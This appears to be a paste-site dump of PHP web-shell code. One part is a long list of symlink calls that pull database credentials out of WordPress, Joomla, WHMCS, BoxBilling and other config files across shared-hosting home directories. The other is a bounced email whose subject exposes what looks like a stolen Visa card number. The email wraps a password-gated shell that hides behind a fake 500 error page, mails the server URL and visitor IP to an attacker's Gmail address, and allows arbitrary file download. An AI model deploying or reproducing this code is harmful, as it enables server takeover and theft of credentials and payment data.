  1351. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1352. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1353. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1354. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1355. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1356. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1357. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1358. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1359. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1360. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1361. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1362. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1363. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1364. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1365. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1366. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1367. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1368. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1369. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1370. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1394. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1395. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1396. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1397. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1398. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1399. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1400. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1401. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1402. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1403. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1404. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1405. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1406. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1407. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1408. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1409. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1410. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1411. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1412. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1413. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1414. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1415. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1416. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1417. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1418. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1419. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1420. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1421. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1422. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1423. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1424. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1425. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1426. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1427. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1428. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1429. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1430. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1431. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1432. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1433. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1434. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1435. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1436. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1437. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1438. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1439. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1440. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1441. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1442. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1443. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1444. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1445. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1446. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1447. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1448. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1449. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1450. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1451. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1452. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1453. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1454. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1455. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1456. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1457. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1458. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1459. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1460. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1461. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1462. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1463. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1464. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1465. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1466. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1467. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1468. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1469. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1470. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1471. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1472. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1473. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1474. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1475. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1476. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1477. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1478. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1479. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1480. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1481. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1482. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1483. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1484. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1485. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1486. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1487. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1488. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1489. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1490. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1491. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1492. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1493. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1494. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1495. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1496. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1497. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1498. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1499. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1500. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1501. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1502. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1503. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1504.  
  1505. //Home1
  1506.  
  1507. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1508. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1509. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1510. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1511. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1512. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1513. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1514. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1515. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1516. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1517. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1518. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1519. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1520. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1521. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1522. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1523. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1524. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1525. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1526. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1527. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1528. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1529. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1530. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1531. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1532. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1533. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1534. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1535. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1536. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1537. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1538. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1539. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1540. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1541. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1542. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1543. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1544. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1545. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1546. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1547. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1548. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1549. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1550. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1551. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1552. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1553. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1577. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1578. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1579. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1580. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1581. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1582. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1583. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1584. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1585. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1586. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1587. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1588. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1589. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1590. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1591. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1592. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1593. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1594. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1595. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1596. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1597. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1598. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1599. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1600. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1601. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1602. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1603. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1604. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1605. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1606. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1607. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1608. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1609. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1610. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1611. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1612. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1613. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1614. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1615. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1616. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1617. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1618. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1619. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1620. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1621. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1622. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1623. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1624. @symlink('/home1/'.$user.'/pu
  1625. ...
  1626. Error Icon
  1627. Message blocked
  1628. Your message to skacauold@gmail.com has been blocked. See technical details below for more information.
  1629. LEARN MORE
  1630. The response was:
  1631. Message rejected. See https://support.google.com/mail/answer/69585 for more information.
  1632.  
  1633.  
  1634. Final-Recipient: rfc822; skacauold@gmail.com
  1635. Action: failed
  1636. Status: 5.0.0
  1637. Diagnostic-Code: smtp; Message rejected. See https://support.google.com/mail/answer/69585 for more information.
  1638. Last-Attempt-Date: Wed, 06 Jun 2018 02:28:56 -0700 (PDT)
  1639.  
  1640.  
  1641. ---------- Forwarded message ----------
  1642. From: Skacauska Old <skacauold@gmail.com>
  1643. To: skacauold@gmail.com
  1644. Cc:
  1645. Bcc:
  1646. Date: Wed, 6 Jun 2018 16:28:54 +0700
  1647. Subject: Re: Apple [ Credit: Visa:4098083908390838 ] HK | 00 | Fr0m 172.68.254.56
  1648. <?php
  1649. @session_start();
  1650. @error_reporting(0);
  1651. @error_log(0);
  1652. @ini_set('error_log',NULL);
  1653. @ini_set('log_errors',0);
  1654. @ini_set('max_execution_time',0);
  1655. @ini_set('output_buffering',0);
  1656. @ini_set('display_errors', 0);
  1657. @set_time_limit(0);
  1658. @set_magic_quotes_runtime(0);
  1659. $lol="170fca09beb300a91e64fa0530e87a7f";
  1660. $tujuanmail = 'aqilnaila23@gmail.com';
  1661. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  1662. $pesan_alert = "fix $x_path :p *IP Address : [ " .
  1663. $_SERVER['REMOTE_ADDR'] . " ]";
  1664. mail($tujuanmail, "Dont Change This!!", $pesan_alert, "[ " .
  1665. $_SERVER['REMOTE_ADDR'] . " ]");
  1666. function printLogin() {
  1667. ?>
  1668. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1669. <html><head>
  1670. <title>500 Internal Server Error</title>
  1671. </head><body>
  1672. <h1>Internal Server Error</h1>
  1673. <p>The server encountered an internal error or
  1674. misconfiguration and was unable to complete
  1675. your request.</p>
  1676. <p>Please contact the server administrator and inform them of the time
  1677. the error occurred,
  1678. and anything you might have done that may have
  1679. caused the error.</p>
  1680. <p>More information about this error may be available
  1681. in the server error log.</p>
  1682. </body></html>
  1683.  
  1684. <br>
  1685. <br>
  1686. <br>
  1687. <br>
  1688. <br>
  1689. </style>
  1690. </head>
  1691. <style>
  1692. input { margin:0;background-color:#fff;border:1px solid #fff; }
  1693. </style>
  1694. <center>
  1695. <form method=post>
  1696. <input type=password name=tokeichun>
  1697. </form></center>
  1698. <?php
  1699. exit;
  1700. }
  1701. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  1702. if( empty( $lol ) ||
  1703. ( isset( $_POST['tokeichun'] ) && ( md5($_POST['tokeichun'])
  1704. == $lol ) ) )
  1705. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  1706. else
  1707. printLogin();
  1708. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] ==
  1709. 'download')) {
  1710. @ob_clean();
  1711. $file = $_GET['file'];
  1712. header('Content-Description: File Transfer');
  1713. header('Content-Type: application/octet-stream');
  1714. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  1715. header('Expires: 0');
  1716. header('Cache-Control: must-revalidate');
  1717. header('Pragma: public');
  1718. header('Content-Length: ' . filesize($file));
  1719. readfile($file);
  1720. exit;
  1721. }
  1722.  
  1723. ?>
  1724. <html>
  1725. <head>
  1726. <title></title>
